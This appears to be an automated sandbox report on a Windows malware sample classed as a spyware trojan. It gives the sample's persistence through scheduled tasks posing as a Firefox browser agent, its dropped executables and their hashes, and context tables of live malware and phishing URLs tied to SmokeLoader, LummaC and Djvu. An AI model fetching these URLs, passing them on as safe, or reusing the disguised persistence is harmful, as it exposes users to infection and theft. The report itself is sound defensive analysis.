                                                                                                      Overall analysis duration:0h 12m 24s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:39
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:1
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:bCnarg2O62.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:fa949a7589dc71ea006eb10ad025618a.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@62/14@5/4
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 150
                                                                                                      • Number of non-executed functions: 85
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 88.221.110.91, 2.16.100.168
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: bCnarg2O62.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      18:19:51API Interceptor207355x Sleep call for process: explorer.exe modified
                                                                                                      18:21:06API Interceptor14x Sleep call for process: WMIC.exe modified
                                                                                                      23:19:54Task SchedulerRun new task: Firefox Default Browser Agent 01E1BB247BE80AD9 path: C:\Users\user\AppData\Roaming\derhswe
                                                                                                      23:20:40Task SchedulerRun new task: Firefox Default Browser Agent 71CD91AEBED31792 path: C:\Users\user\AppData\Roaming\jfrhswe

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      211.171.233.129rFdy6Oh3xT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                      • mzxn.ru/tmp/index.php
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                                                      lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                      • cajgtus.com/files/1/build3.exe
                                                                                                      IzXkxsTrEt.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                      • sdfjhuz.com/dl/build2.exe
                                                                                                      SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                      • trmpc.com/check/index.php
                                                                                                      p2xoB50aKi.exeGet hashmaliciousSmokeLoader, VidarBrowse
                                                                                                      • sjyey.com/tmp/index.php
                                                                                                      RnnWoAEP9mUhOXN_9mNdOzaP.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                                                                                      • cbinr.com/forum/index.php
                                                                                                      qpPYm1rHOS.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                                                                                                      • cbinr.com/forum/index.php
                                                                                                      8TmTmPo08O.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, StealcBrowse
                                                                                                      • sjyey.com/tmp/index.php
                                                                                                      38QTCIw4QJ.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                      • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                                                      109.175.29.39veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • nwgrus.ru/tmp/index.php
                                                                                                      Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • nwgrus.ru/tmp/index.php
                                                                                                      82HD7ZgYPA.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                      • 100xmargin.com/tmp/index.php
                                                                                                      HliN0ju7OT.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                                                      • yosoborno.com/tmp/
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                                                      xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                      • dbfhns.in/tmp/index.php
                                                                                                      file.exeGet hashmaliciousBabuk, Djvu, PrivateLoaderBrowse
                                                                                                      • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
                                                                                                      SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • trmpc.com/check/index.php
                                                                                                      7vMi37TpMO.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                      • kamsmad.com/tmp/index.php

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      nwgrus.ruBzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 105.197.97.247
                                                                                                      UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 185.12.79.25
                                                                                                      LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 197.164.156.210
                                                                                                      wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 190.147.128.172
                                                                                                      HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 177.129.90.106
                                                                                                      c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 190.147.2.86
                                                                                                      9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 190.224.203.37
                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 58.151.148.90
                                                                                                      v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 190.219.117.240
                                                                                                      0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 189.61.54.32
                                                                                                      s-part-0017.t-0009.t-msedge.net9Y6R8fs0wd.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 13.107.246.45
                                                                                                      PFW1cgN8EK.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                                                                                      • 13.107.246.45
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 13.107.246.45
                                                                                                      +18365366724753456-83736-10244688.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://s.craft.me/yB5midhwwaHUPWGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 13.107.246.45
                                                                                                      https://t.dripemail3.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzI4MzA1Mzk4LCJuYmYiOjE3MjgzMDUzOTgsImFjY291bnRfaWQiOiIyNzYyNjA5IiwiZGVsaXZlcnlfaWQiOiJpeHI5d3pqeGcwZnI2NGJjbGwycyIsInRva2VuIjoiaXhyOXd6anhnMGZyNjRiY2xsMnMiLCJzZW5kX2F0IjoxNzI4MzA0MzU0LCJlbWFpbF9pZCI6OTk2Mzg3MCwiZW1haWxhYmxlX3R5cGUiOiJCcm9hZGNhc3QiLCJlbWFpbGFibGVfaWQiOjM5NTM4MjUsInVybCI6Imh0dHBzOi8vZGFpbHlhbGFza2EuY29tL25ld3M_X19zPWw5bzljOTZzbG8xZjF3aGFiODZrJnV0bV9zb3VyY2U9ZHJpcCZ1dG1fbWVkaXVtPWVtYWlsJnV0bV9jYW1wYWlnbj1TcHJpbmcraGFzK3NwcnVuZyslRjAlOUYlOEMlQjEifQ.HIDfaWGNVn-TCtUT4qZNHq7EdymoLEqvVA8XxZBU8z8Get hashmaliciousHtmlDropperBrowse
                                                                                                      • 13.107.246.45
                                                                                                      fp2e7a.wpc.phicdn.net9Y6R8fs0wd.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 192.229.221.95
                                                                                                      http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/Get hashmaliciousUnknownBrowse
                                                                                                      • 192.229.221.95
                                                                                                      PFW1cgN8EK.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 192.229.221.95
                                                                                                      https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                      • 192.229.221.95
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 192.229.221.95
                                                                                                      utmggBCMML.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 192.229.221.95
                                                                                                      Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                      • 192.229.221.95
                                                                                                      https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                      • 192.229.221.95
                                                                                                      https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                      • 192.229.221.95
                                                                                                      https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                      • 192.229.221.95

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      LGDACOMLGDACOMCorporationKR2UngC9fiGa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 106.254.133.76
                                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                                      • 211.237.8.93
                                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                                      • 27.255.85.18
                                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                                      • 211.237.8.97
                                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                                      • 27.255.85.30
                                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                                      • 27.255.85.35
                                                                                                      xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 165.132.246.42
                                                                                                      SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 121.254.178.239
                                                                                                      UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 211.181.24.133
                                                                                                      WhiteDefenderSetup64_20201118.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • 211.171.245.2
                                                                                                      SURFAIRWIRELESS-IN-01USBzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      BIHNETBIHNETAutonomusSystemBAUV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 185.12.79.25
                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 109.175.29.39
                                                                                                      http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand()Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 109.175.10.156
                                                                                                      Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 109.175.29.39
                                                                                                      O9M84hUenb.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 92.36.229.158
                                                                                                      h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                                                                                      • 92.36.226.66
                                                                                                      82HD7ZgYPA.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                      • 109.175.29.39
                                                                                                      fEz10JQnRZ.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                      • 92.36.226.66
                                                                                                      D9pL02CCa3.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                                                                      • 92.36.226.66
                                                                                                      P61q5FVlmo.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                                                      • 92.36.226.66
                                                                                                      SURFAIRWIRELESS-IN-01USBzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162
                                                                                                      0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.162

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      72a589da586844d7f0818ce684948eeaBzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 23.145.40.164
                                                                                                      a0e9f5d64349fb13191bc781f81f42e19Y6R8fs0wd.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      PFW1cgN8EK.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      utmggBCMML.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                      • 23.145.40.168
                                                                                                      Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                      • 23.145.40.168
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 23.145.40.168

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Temp\1D0F.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):453632
                                                                                                      Entropy (8bit):6.3528472110057015
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:rBS3kQBgyTmD60mDGMiH64vt3ro87JKn6+hNtzRUpy6BbO42Tn:YUQBgyXGMslJKnv2NO4O
                                                                                                      MD5:02F50094664F74B387AC57B1DE8679AF
                                                                                                      SHA1:E4DC28C4D8FD6C9010CA95B978133B46CAC5148E
                                                                                                      SHA-256:A9276BC533A2BB42308613EAF590FD97F662E81A4C4F1A1BE43709AE3B923432
                                                                                                      SHA-512:DE298772E5232A547BF7DDCDC45EF9A84BAF46911994D80E93F9F75CD00EE1EA474892AF98C82FD96E343F7A858A3627C39E22E2D17496C13A81950B86F72895
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........;..B;..B;..BT.bB#..BT.WB...BT.VBW..B2.oB<..B;..B...BT.SB:..BT.fB:..BT.aB:..BRich;..B........................PE..L....cd.............................;............@..................................o..........................................P...................................0...............................h...@............................................text............................... ..`.rdata..............................@..@.data............`..................@....xexolu.............................@..@.naxurew............................@..@.havi...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\9245.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):78336
                                                                                                      Entropy (8bit):6.394001797252911
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:WPQkadQWo2lXlxiK/0PJMQ2VGhm9EGFDe8MRDiNfYg9TQRkAuHi5yvaIoFVr1VML:NBfdSKvVwDEhAuBhoL/MnJ0iXD46w0
                                                                                                      MD5:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                      SHA1:BA7888FFDB978851F38C4CAC82D58D8CD9A6F077
                                                                                                      SHA-256:B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
                                                                                                      SHA-512:938CE106217E9CE98F104AF0913054070C2CC5791DFAA9902540CAEF923579B8DE0AF0ED720753BC40ADC75D7E286ACCDE7198315805331F25BE3F312C23F0BC
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d......f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text...x........................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\CD06.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):98304
                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\CD06.tmp-shm

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\D515.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                      Malicious:false
                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\D805.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
